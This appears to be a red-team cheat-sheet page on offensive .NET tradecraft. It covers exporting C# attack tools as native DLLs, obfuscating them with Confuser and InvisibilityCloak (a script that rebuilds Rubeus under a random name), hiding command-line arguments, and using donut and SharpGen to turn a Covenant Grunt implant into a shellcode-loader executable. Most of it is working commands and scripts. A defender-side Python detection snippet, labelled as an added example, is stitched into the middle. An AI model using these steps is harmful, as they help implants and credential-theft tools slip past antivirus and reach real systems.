.NET Assembly

Patch Environment.Exit

C# to Unmanaged DLL

Creating assembly with DLL exports from C# code:

  1. Select your favorite C# offensive tool.

  2. Install DllExport package via "Manage NuGet Packages for Solution" in VS.

  3. Configure DllExport as shown in the screenshot below and click "Apply".

  4. Agree to reload the solution.

  5. Edit the Main function code to work with no arguments passed so that the signature looks like static void Main().

  6. Add the [DllExport] attribute before the Main function.

  7. Check the "Allow unsafe code" and "Optimize code" boxes in the Build tab of the solution.

  8. Build the solution as Release x64 DLL assembly.

  9. (Optional) Obfuscate the assembly with something like Confuser.

DllExport Configuration

The resulting DLL will be placed in the .\bin\x64\Release\x64\ directory.
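From the defender's side, a DLL built this way is unusual because it carries both a CLR header and a native export directory. The triage check below is an added example, not part of the original page or of the DllExport project; the function names are hypothetical and the sample headers are constructed inline.

```python
import struct

EXPORT_DIR, CLR_DIR = 0, 14  # IMAGE_DIRECTORY_ENTRY_EXPORT / _COM_DESCRIPTOR

def pe_data_directories(data: bytes) -> list:
    """Return the (rva, size) data-directory entries of a PE image."""
    try:
        if data[:2] != b"MZ":
            raise ValueError("not an MZ image")
        pe_off = struct.unpack_from("<I", data, 0x3C)[0]
        if data[pe_off:pe_off + 4] != b"PE\0\0":
            raise ValueError("missing PE signature")
        opt = pe_off + 24  # 4-byte signature + 20-byte COFF header
        magic = struct.unpack_from("<H", data, opt)[0]
        if magic not in (0x10B, 0x20B):
            raise ValueError("unknown optional-header magic")
        dd_off = opt + (112 if magic == 0x20B else 96)  # PE32+ vs PE32
        count = min(struct.unpack_from("<I", data, dd_off - 4)[0], 16)
        return [struct.unpack_from("<II", data, dd_off + 8 * i) for i in range(count)]
    except struct.error as exc:
        raise ValueError("truncated PE header") from exc

def is_managed_with_native_exports(data: bytes) -> bool:
    """True when the image has both a CLR header and an export directory."""
    dirs = pe_data_directories(data)
    def present(index):
        return index < len(dirs) and dirs[index][0] != 0 and dirs[index][1] != 0
    return present(CLR_DIR) and present(EXPORT_DIR)

def build_sample(export: bool, clr: bool) -> bytes:
    """Constructed PE32+ headers only (no sections, no code) for the demo."""
    dirs = [(0, 0)] * 16
    if export:
        dirs[EXPORT_DIR] = (0x2000, 0x40)
    if clr:
        dirs[CLR_DIR] = (0x2040, 0x48)
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)  # e_lfanew at 0x3C
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x2022)
    opt = struct.pack("<H", 0x20B) + b"\0" * 106 + struct.pack("<I", 16)
    return dos + coff + opt + b"".join(struct.pack("<II", *d) for d in dirs)

if __name__ == "__main__":
    for name, args in [("C# DLL with exports", (True, True)),
                       ("plain .NET assembly", (False, True)),
                       ("native DLL", (True, False))]:
        print(name, "->", is_managed_with_native_exports(build_sample(*args)))
```

C++/CLI mixed-mode assemblies legitimately have both directories, so treat a hit as a reason to look closer rather than a verdict.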

.NET Obfuscators

Hide the command line by overwriting args with values read from a text file:

string line = File.ReadLines("cmd.txt").FirstOrDefault();
args = line.Split(' ');

Tools

Confusers

InvisibilityCloak

PS > wget https://github.com/h4wkst3r/InvisibilityCloak/raw/main/InvisibilityCloak.py -o InvisibilityCloak.py
PS > git clone https://github.com/GhostPack/Rubeus
PS > python .\InvisibilityCloak.py -d .\Rubeus\ -n (-join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})) -m reverse
PS > cd Rubeus
PS > devenv /build Release .\ChOVuwPZcNQmXtKF.sln
InvisibilityCloak.ps1
$repo = "GhostPack/Rubeus"

$cloak = "C:\Users\user\Desktop\Tools\InvisibilityCloak.py"
$devenv = "C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.com"

$target = $repo.Split('/')[1]
$obf = -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})
git clone "https://github.com/$repo" "C:\Windows\Temp\$target"
python $cloak -d "C:\Windows\Temp\$target" -n $obf -m reverse
& $devenv /build Release "C:\Windows\Temp\$target\$obf.sln"
mv "C:\Windows\Temp\$target\$obf\bin\Release\$obf.exe" "\\vmware-host\Shared Folders\share-host\$obf.exe"
#Remove-Item -Recurse -Force "C:\Windows\Temp\$target"

SharpSploit

SharpGen

Execution.ShellCode

$ ~/tools/PEzor/deps/donut/donut -i GruntHTTP.exe -o grunt.bin
$ echo -n 'var shellcode = Convert.FromBase64String("' > shellcode.txt
$ echo -n `base64 -w0 grunt.bin` >> shellcode.txt
$ echo '");' >> shellcode.txt
$ echo 'ShellCode.ShellCodeExecute(shellcode);' >> shellcode.txt
$ ~/.dotnet/dotnet bin/Debug/netcoreapp2.1/SharpGen.dll -f payload.exe -s shellcode.txt -c Shell -d net40
